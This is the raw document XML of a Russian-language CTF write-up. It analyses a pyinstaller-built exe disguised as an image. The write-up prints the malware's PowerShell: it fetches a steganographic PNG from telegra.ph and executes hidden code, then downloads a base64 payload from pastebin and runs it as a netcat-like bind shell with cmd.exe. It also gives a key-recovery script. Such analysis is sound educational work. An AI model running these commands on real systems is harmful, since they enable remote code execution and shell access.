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3"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Распаковываем архив - получаем картинку.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2795777</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1963578" cy="2191607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578" cy="2191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spacing w:line="228" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Можно запустить (конечно же на виртуалке), откроется вполне безобидная на первый взгляд пикча:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8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719999</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>183633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6127045" cy="4524279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7045" cy="4524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line="228" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ну если с Робертом все понятно - то с картинкой нет. Вооружившись HEX-editor’ом/ внимательностью/посмотрев картинку не в windows/глянув на нее в консоли - обнаруживаем что это exe файл с инветирующим символом в расширении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="228" w:lineRule="auto"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1020" w:bottom="280" w:left="1020" w:right="1020"/>
        </w:sect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6165338" cy="4505896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338" cy="450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28" w:lineRule="auto" w:before="113"/>
        <w:ind w:left="120" w:right="121"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Дальше варианта 2: открыть в любом дизасемблере или покопаться в кексе и найти заветные строчки, которые «тонко» намекнут что программа собрана с помощью pyinstaller. Распаковываем, например, с помощью pyinstxtactor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="228" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Получаем кучку файлов - нас интересует файл bot - это *.pyc файл, меняем сразу расширение. Декомпилировать его не выйдет - отсутсвуют «магические числа» - подставляем их (можно взять тут же, в папке «pyz_extracted» открыть любой файл в HEX редакторе и копировать оттуда), далее файл pyc обрабатываем любым декомпилятором (Uncompyle6/EasyDecompile) и получаем исходный код.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772809</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100322</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6007798" cy="3677888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798" cy="3677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200" w:bottom="280" w:left="1020" w:right="1020"/>
        </w:sectPr>
      </w:pP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6164760" cy="4250245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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760" cy="42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28" w:lineRule="auto" w:before="114"/>
        <w:ind w:left="120" w:right="121"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Видим что тут устанавливается соединение с сервером и какие то действия с повершелом. На серваке ничего интересного пока найти нельзя, тем более что там ключ как то генерируется, стоит посмотреть в сторону повершела. Декодер команду - получаем строку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spacing w:line="247" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("https://telegra.ph/file/c3b225 cbd4d6faf0ee80b.png"));$g.Save("C:\Windows\Temp\Image.png");IEX("C:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="120" w:right="955" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\Windows\Temp\Image.png");$o=a Byte[] 705;(0..0)|%{foreach($x in(0..704)){$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=$g.GetPixel($x,$_);$o[$_*705+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="58"/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-band </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..582]));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="217"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Собственно реализация LSB в картинке, достаем данные, снова декодируем и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>получаем: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  <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:right="1591"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>[IO.File]::WriteAllBytes('C:\Windows\Temp\explorer.exe', [Convert]::FromBase64String((Invoke-WebRequest 'https://pastebin.com/raw/ iHwZCVBV').C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"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ontent));IEX('C:\Windows\Temp\explorer.exe -l -p 80 -e cmd.exe’);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="480" w:lineRule="atLeast" w:before="20"/>
        <w:ind w:left="120" w:right="1482"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ага, запуск nc-подобного ПО. Походу, пора вернуться к ключу и серверу…  Ключ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>генерируется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>помощью</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ГСПЧ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>выставления</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>seed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/>
        <w:t>параметр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>localtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="228" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Дополнительно к заданию шел длинный файл с логами - стоит изучить его и найти примерное время запуска. Раскуриваем алгоритм - пишем обратный скрипт:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="247" w:lineRule="auto" w:before="6"/>
        <w:ind w:right="5711"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>from time import strptime, mktime from hashlib import md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="exact"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from random import seed, random</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1580" w:bottom="280" w:left="1020" w:right="1020"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto" w:before="93"/>
        <w:ind w:left="120" w:right="1591" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>seed(int(mktime(strptime("2018-09-27 16:26:9", '%Y-%m-%d %H:%M:%S')))) key = str(md5(str(random()).encode()).hexdigest())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="exact"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print(key)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28" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="106"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Естественно подставив нужную дату. Стоит учесть, что в коде бота используется  округление round(). Так же, создание процессов занимает некоторое время. А значит стоит потыкать ключ в пределах +-2с (в тестовом примере сейчас идет лог от 06.10.2018 16:08:15, а нужный ключ получается при 13 секунде - это нормально, генерация ключа и   подключение тоже требует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>время)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="228" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Далее пробуем подставлять ключи на сервер ииии…. В одном из случаев он точно не ответит «No».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="228" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="304"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Видим инфо о системе - пробуем подключиться по nc и забираем честно заслуженный флаг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>(Нужно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>учесть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>права</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>пользователя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>запускать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>бота</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>под</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>какого</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>нибудь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>ОЧЕНЬ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>не привилегированного</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>юзера)</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="128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2018-11-25T06:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-25T06:12:02Z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2018-11-25T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>